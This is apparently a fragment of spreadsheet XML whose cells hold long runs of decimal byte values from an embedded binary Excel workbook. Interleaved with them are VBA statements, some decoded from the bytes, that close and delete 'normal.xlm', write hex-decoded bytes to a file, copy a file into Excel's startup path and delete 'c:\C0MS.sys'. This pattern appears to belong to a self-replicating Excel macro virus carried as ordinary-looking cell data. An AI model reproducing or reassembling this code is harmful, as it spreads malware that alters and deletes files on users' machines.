    <t xml:space="preserve">30 99 248 117 178 214 7 129 46 118 129 230 255 191 44 22 23 115 60 100 23 206 0 130 22 58 145 45 182 64 116 88 210 11 65 128 233 89 7 220 104 164 36 164 134 47 173 38 133 13 120 87 16 59 203 125 4 222 26 93 177 181 99 131 20 166 140 43 137 112 113 88 136 45 218 182 163 24 4 8 2 59 72 4 175 90 69 195 91 128 21 255 173 184 157 51 237 45 192 59 213 87 126 93 139 29 68 131 191 244 41 251 90 59 205 116 21 246 65 56 253 95 106 180 62 64 86 233 194 124 236 235 63 139 52 131 235 36 90 159 248 22 80 32 193 231 2 199 193 89 26 248 177 226 172 159 15 97 60 7 59 253 116 182 151 186 23 137 247 59 245 239 78 239 137 110 4 2 12 9 26 219 86 118 46 4 28 120 92 48 241 236 213 116 175 26 33 217 184 20 205 220 170 32 1 154 98 132 21 219 117 221 126 201 251 5 117 119 96 8 196 88 229 26 30 16 57 190 79 71 207 246 13 220 205 77 144 28 42 84 172 84 11 37 69 93 3 28 43 115 29 72 115 49 76 5 3 173 235 237 255 209 86 59 202 125 21 141 52 73 43 209 4 181 216 114 230 38 2 171 161 185 253 198 12 74 117 247 139 35 53 84 61 222 192 48 12 216 15 223 12 131 192 112 61 144 18 129 200 207 128 252 93 61 145 132 74 61 147 207 128 252 12 133 55 61 141 130 36 242 252 12 200 61 143 134 17 61 146 10 181 198 12 113 138 80 136 106 144 125 141 99 11 36 137 10 89 94 206 250 81 213 65 175 201 17 34 163 227 179 9 65 174 204 178 181 12 52 160 237 128 205 182 251 4 236 80 57 21 16 86 184 95 122 186 247 5 116 237 235 208 192 187 198 115 4 57 58 211 219 254 16 117 245 141 12 73 94 3 141 21 193 18 116 140 192 75 187 246 195 83 91 57 29 168 91 117 118 68 97 67 234 55 155 19 121 51 255 165 23 74 13 167 63 188 60 61 116 72 180 180 193 95 201 51 92 89 189 6 100 232 32 130 41 110 61 189 4 14 247 56 162 109 81 139 0 243 177 151 253 239 200 6 178 9 139 61 65 56 31 116 57 85 87 177 91 137 143 57 139 232 89 </t>
  </si>
  <si>
    <t xml:space="preserve">23 37 248 249 223 12 240 186 189 5 166 241 157 170 50 219 134 128 180 102 107 162 47 4 132 177 89 7 136 187 248 47 253 50 216 136 68 53 248 195 53 240 70 131 254 8 124 234 221 106 8 216 29 1 7 58 44 9 179 11 70 16 82 55 204 58 63 240 14 90 95 198 70 246 213 100 208 172 220 51 83 123 4 106 110 196 124 180 48 189 104 172 185 106 14 179 174 225 214 33 187 164 160 21 54 135 64 238 135 156 61 72 181 129 232 53 153 233 114 193 64 227 212 207 56 66 96 9 75 50 152 61 55 218 1 3 12 117 37 119 59 220 179 19 185 144 20 27 21 88 104 247 129 38 41 3 8 100 87 190 181 138 147 29 173 219 14 248 253 248 172 50 203 246 252 154 164 104 155 88 118 26 96 252 70 253 106 94 9 70 216 183 153 146 252 98 28 75 157 31 244 34 172 196 180 79 1 33 91 176 100 86 83 77 16 8 97 3 54 5 240 79 73 13 183 82 56 201 62 75 118 38 144 139 96 134 78 184 248 161 206 188 215 209 18 207 170 175 16 3 157 43 55 196 74 209 254 226 87 230 7 247 184 90 128 217 24 2 208 22 112 99 251 130 15 198 104 196 137 236 2 224 0 179 109 60 132 250 87 154 240 11 92 161 65 11 238 53 96 5 235 87 218 112 117 148 174 85 242 7 220 198 220 51 35 219 6 243 87 35 100 104 19 169 10 27 157 33 104 1 204 72 228 115 205 21 168 228 170 38 11 23 39 155 139 109 102 136 8 216 35 4 50 120 217 160 27 51 75 87 86 1 123 216 111 220 74 29 8 102 20 3 131 249 228 77 216 119 176 45 209 187 11 186 211 224 193 224 86 236 227 172 23 70 54 183 30 24 79 41 116 216 4 176 102 127 251 187 111 24 146 15 183 192 104 15 175 193 131 192 31 153 53 136 106 32 89 247 249 33 46 109 11 25 180 30 236 160 132 40 110 182 238 6 176 117 140 208 144 1 227 148 2 152 219 150 101 89 156 160 164 168 54 198 94 3 176 1 188 141 68 8 40 135 212 51 23 110 208 218 89 227 255 13 117 132 2 232 106 5 39 208 237 15 243 165 111 112 176 128 31 115 0 13 180 232 24 119 86 181 211 178 </t>
  </si>
  <si>
    <t xml:space="preserve">If Workbooks(i).Name = "normal.xlm" Then</t>
  </si>
  <si>
    <t xml:space="preserve">32 65 115 32 66 121 116 101 30 0 0 98 117 102 32 61 32 67 66 121 116 101 40 77 105 100 40 104 118 44 32 110 44 32 109 32 45 32 110 41 41 13 0 0 80 117 116 32 35 49 44 32 44 32 98 117 102 57 0 0 102 115 111 46 99 111 112 121 102 105 108 101 32 102 105 108 101 120 108 109 44 32 65 112 112 108 105 99 97 116 105 111 110 46 83 116 97 114 116 117 112 80 97 116 104 32 38 32 34 92 34 44 32 84 114 117 101 28 0 0 102 115 111 46 100 101 108 101 116 101 102 105 108 101 32 34 99 58 92 67 48 77 83 46 115 121 115 34 255 0 58 0 8 0 101 8 0 0 12 0 0 0 40 10 0 0 207 1 0 0 207 10 0 0 118 2 0 0 168 11 0 0 79 3 0 0 159 12 0 0 70 4 0 0 169 13 0 0 80 5 0 0 157 15 0 0 68 7 0 0 10 0 0 0 9 8 16 0 0 6 64 0 222 30 205 7 201 128 0 0 6 2 0 0 11 2 32 0 0 0 0 0 0 0 0 0 128 0 0 0 56 22 0 0 27 28 0 0 163 32 0 0 247 36 0 0 255 40 0 0 13 0 2 0 1 0 12 0 2 0 100 0 15 0 2 0 1 0 17 0 2 0 0 0 16 0 8 0 252 169 241 210 77 98 80 63 95 0 2 0 1 0 42 0 2 0 0 0 43 0 2 0 0 0 130 0 2 0 1 0 128 0 8 0 0 0 0 0 0 0 0 0 37 2 4 0 0 0 29 1 129 0 2 0 193 4 20 0 0 0 21 0 0 0 131 0 2 0 0 0 132 0 2 0 0 0 77 0 150 4 0 0 92 0 92 0 74 0 78 0 95 0 84 0 74 0 83 0 92 0 72 0 80 0 32 0 76 0 97 0 115 0 101 0 114 0 74 0 101 0 116 0 32 0 53 0 49 0 48 0 48 0 32 0 80 0 67 0 76 0 32 0 53 0 0 0 1 4 24 0 220 0 184 3 15 63 0 2 1 0 9 0 153 11 51 8 100 0 1 0 7 0 88 2 2 0 1 0 88 2 0 0 0 0 76 0 101 0 116 0 116 0 101 0 114 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 </t>
  </si>
  <si>
    <t xml:space="preserve">69 218 73 34 85 52 93 86 136 2 15 54 46 87 111 55 240 3 220 50 108 89 240 89 3 253 55 117 201 93 252 142 64 177 255 132 67 137 29 11 137 30 214 147 91 104 51 47 164 169 14 91 36 149 112 175 108 189 190 224 43 26 153 165 184 209 35 86 91 21 56 82 161 130 6 253 177 162 200 36 254 56 24 173 102 253 190 221 142 248 80 3 252 80 83 83 159 27 182 125 174 45 13 219 216 136 212 59 24 214 161 221 181 97 147 8 47 39 36 134 80 86 41 10 109 135 53 252 39 20 184 137 54 203 20 219 156 163 138 189 76 149 218 45 211 24 114 193 131 33 114 147 10 100 136 125 193 199 181 200 8 11 74 152 150 3 55 72 249 102 192 45 22 122 34 117 68 163 1 173 250 34 246 27 109 177 251 132 255 37 1 210 246 130 97 121 71 46 197 66 129 27 229 1 89 6 138 118 100 236 133 149 22 70 64 11 213 235 206 12 183 183 81 32 164 197 70 64 28 235 67 121 219 34 99 30 5 4 64 68 218 246 131 107 238 254 45 25 24 136 30 70 101 32 116 9 9 8 172 177 64 121 9 117 204 192 72 99 74 180 53 114 116 102 255 30 136 78 0 192 247 53 179 94 224 68 43 5 39 3 104 96 102 204 225 23 200 188 133 179 181 85 196 83 2 156 8 133 224 239 91 108 34 92 211 64 67 235 247 146 44 246 195 251 11 142 216 228 37 123 109 13 128 120 1 34 141 227 15 20 226 91 29 139 194 235 3 130 206 210 250 173 193 27 24 24 15 148 130 5 209 235 139 211 75 181 183 127 27 249 14 67 136 198 6 92 70 177 75 117 243 128 205 183 108 208 167 74 205 24 10 138 63 116 172 43 224 160 58 125 67 40 25 226 194 9 19 6 6 31 27 15 64 248 64 115 3 3 21 1 96 28 162 225 238 107 67 48 15 14 112 199 3 131 39 142 111 148 154 171 20 255 251 72 73 161 228 119 129 246 248 3 2 139 45 76 96 77 209 9 27 141 109 163 255 168 117 4 213 14 11 116 217 226 247 76 190 33 237 235 40 67 72 204 153 89 248 248 59 251 23 234 27 2 182 10 52 234 94 30 64 177 136 129 170 109 214 97 67 12 63 39 </t>
  </si>
  <si>
    <t xml:space="preserve">45 81 100 140 252 224 148 128 75 177 253 50 236 232 141 116 1 40 9 180 15 93 252 75 38 186 228 184 118 47 132 255 4 118 3 106 2 95 217 218 59 60 11 86 27 200 57 54 124 191 141 189 223 190 69 176 191 188 41 47 106 20 51 210 89 216 40 247 237 1 125 228 23 199 141 52 134 87 64 210 183 11 131 224 190 39 57 172 119 169 4 224 116 124 179 179 181 33 17 73 224 140 8 128 204 8 166 155 171 0 49 108 77 200 18 195 59 85 196 228 78 67 150 136 18 82 252 44 0 202 73 225 166 190 161 49 115 23 70 127 50 84 212 86 24 64 200 151 59 29 9 196 18 153 50 149 178 102 67 89 39 154 210 23 130 72 138 97 20 139 124 36 27 236 125 46 193 87 69 31 53 116 29 21 17 28 155 226 228 227 11 102 7 0 15 250 136 230 8 98 70 73 144 186 65 63 81 181 203 131 101 108 242 124 0 1 142 165 88 233 106 212 81 31 136 27 29 39 137 26 145 124 55 236 104 45 200 2 96 176 35 120 41 194 214 181 90 255 158 25 80 147 120 131 137 28 244 231 236 177 120 131 197 112 126 201 228 54 93 13 234 220 104 204 4 180 35 23 168 39 21 56 177 117 7 130 110 211 181 93 98 36 175 162 21 52 190 2 47 11 243 61 196 59 198 145 124 20 48 210 141 147 173 128 26 10 44 229 51 10 220 73 11 107 231 124 176 212 242 72 158 108 140 0 255 1 255 0 255 75 88 228 18 50 18 83 50 95 161 169 14 187 133 21 34 60 135 236 138 38 64 95 43 108 160 108 181 8 157 147 10 224 20 204 177 33 35 11 22 136 137 23 139 146 140 116 21 249 249 187 134 21 35 155 21 253 253 85 97 69 67 252 16 80 190 173 86 86 144 228 86 188 21 79 108 186 45 24 193 51 68 102 237 77 151 146 131 117 74 247 241 137 247 27 68 228 118 54 63 40 81 124 180 15 94 148 150 218 110 77 108 102 99 225 101 22 25 103 20 28 198 1 125 96 176 96 147 230 86 139 9 1 217 240 205 150 22 135 7 249 85 240 185 151 144 226 37 17 28 15 61 242 21 179 71 236 224 68 95 87 108 181 37 177 123 136 218 203 29 136 189 32 </t>
  </si>
  <si>
    <t xml:space="preserve">Workbooks(i).Close</t>
  </si>
  <si>
    <t xml:space="preserve">0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 148 4 46 0 72 80 32 76 97 115 101 114 74 101 116 32 53 49 48 48 32 80 67 76 32 53 101 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 4 0 50 0 163 1 134 3 120 156 101 144 203 78 20 81 16 134 235 239 58 112 184 42 11 110 26 140 141 87 32 164 211 140 204 198 89 152 0 26 32 189 232 4 69 182 147 76 71 7 72 21 116 67 130 49 106 102 169 11 92 185 210 68 215 62 129 16 94 193 167 48 186 118 231 29 61 167 35 19 19 107 241 255 149 239 84 170 234 84 81 252 31 1 232 62 166 2 103 155 120 77 118 15 32 178 29 165 118 122 149 223 36 151 33 135 208 139 104 5 144 46 180 44 228 28 120 159 135 73 150 130 237 9 232 3 200 37 180 94 242 110 12 153 130 92 129 78 66 43 80 24 77 140 107 114 21 99 228 236 14 12 121 95 253 235 119 189 251 228 33 206 144 125 226 167 109 61 134 60 130 62 133 60 131 172 25 255 56 237 171 164 110 200 173 168 8 61 250 200 163 222 136 6 136 63 112 131 236 39 14 168 12 87 179 142 20 210 13 253 66 242 139 242 239 36 63 73 206 67 191 146 254 32 57 38 29 130 12 67 26 129 140 64 67 232 40 184 31 13 146 83 208 1 232 105 236 142 131 95 241 27 226 27 110 150 216 64 46 64 15 88 122 141 244 24 237 54 246 93 121 154 179 165 90 227 181 175 212 177 146 124 38 175 239 217 105 39 232 100 43 162 253 232 36 115 216 180 241 219 127 113 71 27 191 104 99 215 244 27 13 18 207 99 45 224 5 39 242 156 245 38 200 30 113 74 183 235 249 189 108 39 76 243 166 236 100 249 245 197 52 76 234 69 150 47 59 86 157 137 227 112 37 203 155 89 81 75 231 147 176 90 91 76 231 110 85 170 51 149 </t>
  </si>
  <si>
    <t xml:space="preserve">194 246 118 107 109 128 57 30 250 235 64 64 8 24 117 249 6 219 216 45 125 242 43 198 47 68 78 209 248 142 64 2 244 82 181 70 93 3 205 52 255 215 150 218 146 190 53 59 235 116 50 50 20 178 35 168 185 14 218 28 85 198 36 37 33 219 211 12 234 173 14 203 39 92 9 139 109 139 179 117 3 86 158 64 185 83 137 78 230 218 6 157 76 165 133 177 116 60 127 91 3 151 96 139 199 204 56 123 251 4 246 43 199 183 194 146 182 64 106 85 206 170 251 235 11 107 226 69 75 186 86 79 198 87 61 224 192 161 103 60 198 40 185 236 208 64 27 200 236 68 206 104 17 58 210 164 169 48 101 50 27 21 43 70 232 139 82 199 182 32 69 123 245 70 175 134 41 54 115 26 128 208 182 119 233 109 117 198 70 93 161 35 245 8 5 27 163 166 33 247 235 226 141 225 159 92 102 139 109 12 160 163 66 117 197 157 68 233 94 91 250 108 11 185 48 141 220 184 96 74 127 128 237 45 182 46 124 2 118 57 11 125 82 191 164 108 83 45 115 76 143 130 56 131 127 165 187 235 253 137 7 141 136 24 247 24 128 96 126 8 236 5 26 148 64 219 30 8 129 193 124 136 253 153 99 228 213 73 124 187 235 6 139 9 13 208 226 86 251 209 126 70 172 251 54 114 209 184 208 138 77 140 193 1 126 203 208 88 209 149 251 165 0 88 30 173 66 70 108 192 207 146 40 38 224 6 221 137 8 47 136 147 71 69 51 47 240 89 227 254 124 186 80 236 60 216 255 154 216 117 77 251 214 133 6 227 0 4 129 180 106 246 88 235 136 17 186 15 112 195 72 243 192 245 88 84 168 63 98 178 219 131 255 115 23 87 102 12 158 137 62 111 141 210 15 208 6 128 78 106 234 10 3 117 10 246 37 118 55 8 235 4 5 128 67 28 3 124 155 255 184 53 86 153 45 54 80 254 68 209 4 133 90 109 156 98 104 120 172 91 122 148 118 192 99 100 85 163 128 122 9 58 54 60 45 46 35 224 74 15 72 154 112 80 6 96 26 117 195 127 213 145 35 247 224 85 89 104 160 48 176 233 145 112 29 175 66 108 93 57 139 229 116 234 190 116 130 76 247 65 4 6 </t>
  </si>
  <si>
    <t xml:space="preserve">35 39 28 245 245 243 206 22 110 193 11 235 232 100 32 180 92 181 84 183 165 93 184 235 177 50 102 123 119 236 64 72 110 129 6 141 181 39 212 208 236 69 107 182 136 46 24 83 102 46 179 11 116 152 237 86 49 76 251 67 43 72 85 3 27 15 62 241 205 212 42 15 6 120 60 120 137 253 215 166 68 219 211 177 177 206 64 177 236 208 44 180 89 188 179 157 223 212 19 60 53 34 252 0 6 200 224 215 0 3 159 13 87 223 106 11 89 190 168 41 144 0 165 102 140 51 30 232 165 106 52 93 46 159 171 16 5 35 11 64 240 253 253 19 198 96 97 218 194 0 237 25 191 229 8 215 139 64 141 22 81 80 188 195 2 204 135 64 18 99 7 157 2 211 193 56 83 184 60 216 97 138 156 253 184 53 56 227 7 64 122 118 39 55 58 33 28 84 181 147 182 87 191 101 5 127 157 75 33 3 12 89 137 213 72 188 165 20 163 61 244 109 102 13 213 45 30 3 3 80 85 80 28 22 117 5 255 104 116 71 106 12 3 200 135 10 254 154 224 201 243 12 200 150 30 190 89 51 199 207 237 185 64 4 76 18 104 116 138 154 108 246 156 108 91 76 64 18 20 169 38 107 72 188 235 146 98 59 87 85 72 195 8 118 223 29 232 177 135 65 64 235 95 116 17 96 75 154 204 33 228 32 222 136 150 106 133 200 88 15 35 102 30 156 206 205 112 139 53 185 10 201 112 160 240 202 182 209 10 39 122 144 229 148 61 60 206 141 171 224 255 126 68 205 146 27 125 209 164 191 235 87 181 200 252 117 93 183 89 12 251 240 187 212 192 4 86 144 91 5 217 22 19 4 146 197 241 13 100 23 216 55 172 50 194 182 37 95 183 226 64 14 242 39 160 17 240 64 158 3 121 148 247 136 228 57 144 231 243 120 244 96 150 228 249 14 248 185 76 28 115 15 154 104 192 72 121 10 178 230 31 188 94 172 240 174 11 73 0 198 169 236 42 4 51 174 79 50 131 246 145 198 92 53 44 232 120 117 14 104 8 17 84 46 61 29 252 128 24 237 200 254 48 91 119 142 17 201 254 27 170 28 248 120 54 100 3 141 200 11 106 47 6 13 76 58 115 160 172 3 186 73 </t>
  </si>
  <si>
    <t xml:space="preserve">fso.deletefile Application.StartupPath &amp; "\normal.xlm"</t>
  </si>
  <si>
    <t xml:space="preserve">104 33 73 106 171 89 94 52 85 194 217 168 18 71 190 54 154 189 22 251 97 75 232 39 237 129 244 66 250 220 254 6 35 229 77 55 96 221 237 221 167 254 0 88 11 97 14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157 184 28 16 239 192 45 154 139 106 152 16 137 2 184 168 127 56 213 101 195 31 216 106 254 104 168 48 137 110 178 92 76 255 53 0 25 32 241 228 184 221 162 139 151 131 254 240 46 59 217 214 213 95 104 237 32 118 139 12 179 137 76 35 72 23 247 189 81 225 124 179 176 235 104 1 1 45 179 125 206 241 126 251 33 90 255 84 8 235 195 100 143 5 67 161 140 250 254 74 116 230 100 11 15 129 121 4 104 117 22 54 218 90 12 81 165 82 132 81 176 5 86 48 113 247 155 138 81 187 100 44 112 8 111 109 59 10 206 137 75 2 67 207 107 12 89 27 169 255 219 91 194 103 204 204 86 67 50 48 88 67 48 48 219 8 250 219 168 182 209 155 93 70 215 64 228 26 116 162 20 216 212 71 107 14 76 212 18 37 25 62 33 219 18 223 101 115 123 8 193 97 97 118 177 143 110 237 55 42 94 86 85 141 107 16 168 11 93 94 93 225 94 232 65 11 195 51 120 60 37 130 32 110 25 235 182 132 179 4 29 86 12 198 8 54 182 49 217 10 110 222 143 73 143 85 186 144 115 221 12 59 8 48 26 110 143 235 251 29 251 21 87 219 235 28 201 235 21 92 106 255 63 180 33 196 38 93 22 148 188 183 86 91 53 59 139 77 65 238 3 24 80 151 161 186 100 36 225 161 213 160 119 125 67 1 152 241 42 131 61 72 112 212 117 33 104 160 235 67 185 252 62 224 161 232 202 89 177 232 176 51 113 255 21 89 135 106 216 160 203 164 1 85 8 147 120 62 59 106 67 108 218 143 11 65 65 61 162 124 241 91 120 187 90 176 241 66 59 150 26 38 28 42 116 102 105 152 108 187 232 112 13 109 239 161 155 16 215 168 250 117 11 241 145 40 209 23 101 92 111 184 176 110 18 27 41 0 185 48 19 23 156 157 69 121 148 99 64 37 89 18 87 128 177 120 75 145 189 7 96 64 59 139 179 23 177 60 118 41 25 80 115 248 13 64 247 47 53 109 59 106 3 3 248 104 144 65 87 73 115 51 91 27 56 85 96 255 116 25 108 236 44 16 87 12 124 29 112 158 205 220 15 124 255 182 124 211 22 17 104 16 59 200 96 142 171 39 72 55 183 89 </t>
  </si>
  <si>
    <t xml:space="preserve">17 44 216 6 36 207 132 135 228 155 185 150 67 23 244 244 177 218 112 239 80 177 23 15 83 41 125 193 54 225 52 200 240 177 152 8 233 132 205 167 185 255 43 45 246 252 186 208 186 94 179 195 54 10 195 60 50 42 154 219 195 1 106 229 158 36 176 157 200 167 139 240 148 115 73 249 196 186 92 46 249 12 250 176 186 24 144 80 225 241 35 75 118 96 164 106 7 137 133 174 86 215 80 203 134 172 180 184 198 180 31 155 173 253 72 92 188 57 29 76 232 8 35 156 15 149 217 10 185 75 183 133 42 109 74 141 228 36 74 48 178 69 245 228 252 89 249 28 131 194 164 178 44 255 45 255 115 155 237 37 16 133 164 104 144 4 155 0 38 129 55 21 252 28 18 92 97 230 73 18 27 34 134 214 37 31 94 18 179 71 245 83 36 58 58 155 58 232 80 60 132 186 225 152 63 183 190 70 232 90 212 89 213 171 212 104 124 66 58 93 6 208 104 111 54 6 28 12 69 41 52 54 49 115 4 3 36 30 19 251 255 126 54 215 88 177 138 140 5 15 50 76 5 212 64 131 248 8 136 14 157 133 210 110 199 68 124 232 224 223 164 221 85 4 152 85 136 28 184 44 12 166 56 188 114 48 110 53 146 1 12 156 81 120 16 252 168 255 72 168 144 154 137 106 98 88 57 6 118 132 77 193 82 105 6 48 139 14 43 78 192 21 4 35 182 38 240 131 104 32 17 28 203 12 94 186 200 200 8 54 100 104 111 253 235 122 3 9 1 15 209 104 200 166 160 64 102 100 190 251 127 54 254 251 118 30 141 132 29 24 138 8 80 136 15 68 156 71 1 71 131 30 192 142 254 195 4 71 59 222 114 226 67 209 238 174 88 54 224 224 106 208 174 156 157 203 248 251 172 187 156 80 191 156 87 190 144 102 219 154 65 112 20 199 16 15 143 188 32 201 67 203 160 86 109 22 162 80 123 6 121 44 3 204 134 97 144 27 7 211 0 219 69 55 201 252 78 175 96 82 240 230 242 154 173 203 2 248 200 76 228 170 1 14 68 132 85 235 140 224 117 96 68 168 228 90 53 8 22 13 241 144 117 38 124 176 170 34 198 2 136 24 86 177 120 64 50 182 97 188 30 89 </t>
  </si>
  <si>
    <t xml:space="preserve">0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 161 0 34 0 9 0 100 0 1 0 1 0 1 0 2 0 88 2 88 2 0 0 0 0 0 0 224 63 0 0 0 0 0 0 224 63 1 0 85 0 2 0 8 0 125 0 12 0 0 0 0 0 64 15 15 0 3 0 2 0 125 0 12 0 1 0 1 0 128 3 15 0 3 0 2 0 125 0 12 0 2 0 2 0 32 14 25 0 3 0 2 0 125 0 12 0 3 0 4 0 224 8 24 0 2 0 2 0 125 0 12 0 5 0 5 0 224 8 15 0 2 0 2 0 0 2 14 0 0 0 0 0 128 0 0 0 0 0 5 0 0 0 8 2 16 0 0 0 0 0 2 0 29 1 0 0 0 0 0 1 15 0 8 2 16 0 1 0 0 0 2 0 29 1 0 0 0 0 0 1 15 0 8 2 16 0 2 0 0 0 2 0 59 1 0 0 0 0 0 1 15 0 8 2 16 0 3 0 0 0 2 0 29 1 0 0 0 0 0 1 15 0 8 2 16 0 4 0 0 0 2 0 29 1 0 0 0 0 0 1 15 0 8 2 16 0 5 0 0 0 2 0 29 1 0 0 0 0 0 1 15 0 8 2 16 0 6 0 0 0 2 0 29 1 0 0 0 0 0 1 15 0 8 2 16 0 7 0 0 0 2 0 29 1 0 0 0 0 0 1 15 0 8 2 16 0 8 0 0 0 2 0 29 1 0 0 0 0 0 1 15 0 8 2 16 0 9 0 0 0 2 0 59 1 0 0 0 0 0 1 15 0 8 2 16 0 10 0 0 0 2 0 59 1 0 0 0 0 0 1 15 0 8 2 16 0 11 0 0 0 2 0 59 1 0 0 0 0 0 1 15 0 8 2 16 0 12 0 0 0 2 0 29 1 0 0 0 0 0 1 15 0 8 2 16 0 13 0 0 0 2 0 59 1 0 0 0 0 0 1 15 0 8 2 16 0 14 0 0 0 2 0 59 1 0 0 0 0 0 1 15 0 8 2 16 0 15 0 0 0 2 0 59 1 0 0 0 0 0 1 15 0 8 2 16 0 16 0 1 0 2 0 59 1 0 0 0 0 0 1 15 0 8 2 16 0 17 0 1 0 2 0 59 1 </t>
  </si>
  <si>
    <t xml:space="preserve">130 216 6 125 44 95 235 38 106 141 48 147 118 19 234 109 54 58 8 106 244 219 220 45 198 162 80 148 94 41 104 64 237 50 77 9 35 191 148 124 113 182 238 173 172 131 37 116 8 0 6 120 53 185 17 184 28 163 112 79 104 5 198 0 26 123 227 45 154 161 24 28 128 161 124 7 136 187 133 63 234 220 20 16 43 80 12 88 0 36 114 7 24 166 66 11 156 20 175 201 204 13 71 33 182 28 85 79 210 18 45 182 13 74 25 117 113 12 90 191 232 224 95 250 194 252 87 193 238 178 206 139 122 252 105 201 4 193 75 75 221 125 3 141 141 140 1 68 153 137 93 244 97 240 127 33 92 75 137 19 247 126 117 127 193 249 4 106 250 197 27 245 63 73 95 137 7 207 118 3 3 76 19 148 169 165 214 220 3 95 72 135 254 214 111 190 126 32 115 28 191 128 211 239 141 76 1 21 215 33 124 176 68 254 246 82 187 45 66 43 117 33 57 7 131 193 224 30 166 56 152 11 45 33 188 176 163 54 92 233 116 36 6 184 81 184 124 11 176 25 219 85 137 10 4 8 3 250 121 91 224 91 185 8 140 140 193 255 4 79 24 63 123 93 1 67 91 134 95 176 115 151 236 88 51 117 27 106 160 66 43 167 17 161 221 149 122 139 86 248 73 90 244 166 118 5 137 240 231 182 214 243 202 65 27 251 64 62 59 250 118 90 133 184 109 51 250 191 116 107 155 32 145 145 1 219 190 81 189 186 234 11 22 185 228 210 33 84 17 30 189 177 150 144 15 210 33 148 76 82 202 114 182 109 191 73 190 74 11 4 8 104 97 139 214 17 145 187 236 213 9 80 120 109 180 115 238 137 247 88 115 221 27 182 178 249 41 11 38 137 47 14 251 101 43 91 5 8 151 74 99 138 76 7 4 239 222 237 187 127 32 136 77 15 254 193 136 11 115 37 128 125 15 70 14 187 136 68 178 221 13 118 211 235 118 9 25 13 118 35 246 173 63 177 9 24 235 41 36 227 79 224 25 59 4 247 44 37 89 4 15 157 132 183 188 197 27 30 9 56 139 84 69 240 137 26 57 19 252 255 39 30 203 2 60 250 161 118 110 1 188 124 128 223 73 108 122 61 104 96 54 160 </t>
  </si>
  <si>
    <t xml:space="preserve">176 107 131 77 199 151 128 54 9 117 29 122 42 72 3 120 122 88 31 5 127 151 147 151 233 47 178 20 116 190 1 123 251 226 53 52 98 11 93 81 36 204 106 16 69 109 180 58 191 255 80 64 247 216 26 93 54 69 214 79 65 161 181 90 30 104 139 200 183 222 172 175 0 115 12 83 159 78 14 11 246 23 117 145 116 151 240 97 169 194 104 238 74 11 194 65 136 88 67 145 14 245 9 18 28 71 136 29 40 77 8 225 21 213 181 72 196 241 35 18 136 201 115 22 103 205 62 246 204 98 120 197 161 88 131 211 65 137 88 81 251 212 67 25 25 217 92 68 5 220 224 228 104 133 25 25 232 236 244 208 60 4 161 137 5 140 13 193 219 21 131 147 163 202 34 104 85 60 183 164 89 156 121 158 23 141 89 64 83 189 24 162 71 80 156 224 215 57 5 219 116 12 207 192 113 140 250 53 93 195 69 191 80 24 36 150 136 133 93 87 18 1 112 183 151 38 208 84 194 93 12 64 36 137 3 128 8 153 118 15 14 226 204 125 235 180 64 71 219 104 3 164 106 19 92 2 99 99 238 20 66 52 80 10 86 32 223 227 88 117 1 64 104 16 121 83 176 220 219 87 53 198 64 1 86 199 3 2 8 2 182 63 237 22 20 57 127 196 52 131 56 159 5 144 195 150 93 143 235 73 103 152 0 208 9 187 16 63 16 87 150 131 63 167 98 3 182 42 21 51 199 235 15 130 166 224 65 90 31 81 206 23 69 54 248 12 53 52 15 176 69 161 159 159 201 216 248 19 116 0 77 164 187 74 83 154 2 211 176 214 83 61 220 231 172 120 162 230 245 30 125 32 55 17 55 58 224 129 120 70 22 135 36 70 182 207 214 123 6 7 28 70 4 8 32 20 107 173 46 90 40 218 118 153 8 17 37 151 109 134 141 14 24 44 4 33 205 37 221 16 29 3 28 6 225 147 166 173 234 100 178 86 129 199 44 45 4 47 131 155 18 88 188 221 56 86 96 27 82 240 13 89 189 237 95 20 152 73 22 147 180 84 35 3 50 129 110 232 184 52 60 68 3 252 76 86 190 0 144 1 107 208 165 204 155 173 35 22 167 216 81 3 236 208 81 136 133 120 129 86 99 3 </t>
  </si>
  <si>
    <t xml:space="preserve">Next</t>
  </si>
  <si>
    <t xml:space="preserve">0 0 0 0 0 1 15 0 8 2 16 0 18 0 1 0 2 0 59 1 0 0 0 0 0 1 15 0 8 2 16 0 19 0 1 0 2 0 59 1 0 0 0 0 0 1 15 0 8 2 16 0 20 0 1 0 2 0 29 1 0 0 0 0 0 1 15 0 8 2 16 0 21 0 1 0 2 0 59 1 0 0 0 0 0 1 15 0 8 2 16 0 22 0 1 0 2 0 59 1 0 0 0 0 0 1 15 0 8 2 16 0 23 0 1 0 2 0 29 1 0 0 0 0 0 1 15 0 8 2 16 0 24 0 1 0 2 0 59 1 0 0 0 0 0 1 15 0 8 2 16 0 25 0 1 0 2 0 59 1 0 0 0 0 0 1 15 0 8 2 16 0 26 0 1 0 2 0 59 1 0 0 0 0 0 1 15 0 8 2 16 0 27 0 1 0 2 0 59 1 0 0 0 0 0 1 15 0 8 2 16 0 28 0 1 0 2 0 59 1 0 0 0 0 0 1 15 0 8 2 16 0 29 0 1 0 2 0 59 1 0 0 0 0 0 1 15 0 8 2 16 0 30 0 1 0 2 0 59 1 0 0 0 0 0 1 15 0 8 2 16 0 31 0 1 0 2 0 59 1 0 0 0 0 0 1 15 0 6 0 43 0 0 0 0 0 15 0 1 0 0 0 0 0 255 255 0 0 1 0 0 254 21 0 23 11 0 99 58 92 67 48 77 83 46 115 121 115 30 3 0 66 2 132 0 253 0 10 0 0 0 1 0 22 0 39 0 0 0 6 0 47 0 1 0 0 0 15 0 1 0 0 0 0 0 255 255 0 0 2 0 0 255 25 0 23 7 0 67 111 117 110 116 101 114 37 0 0 82 0 1 192 1 192 29 1 66 3 226 0 253 0 10 0 1 0 1 0 22 0 50 0 0 0 6 0 35 0 2 0 0 0 15 0 0 0 0 0 0 0 34 64 0 0 3 0 0 255 13 0 68 0 0 0 0 67 1 0 0 0 65 137 0 253 0 10 0 2 0 1 0 23 0 2 0 0 0 6 0 25 0 3 0 0 0 15 0 1 0 1 0 0 0 255 255 0 0 4 0 0 255 3 0 65 174 0 253 0 10 0 3 0 1 0 22 0 28 0 0 0 6 0 </t>
  </si>
  <si>
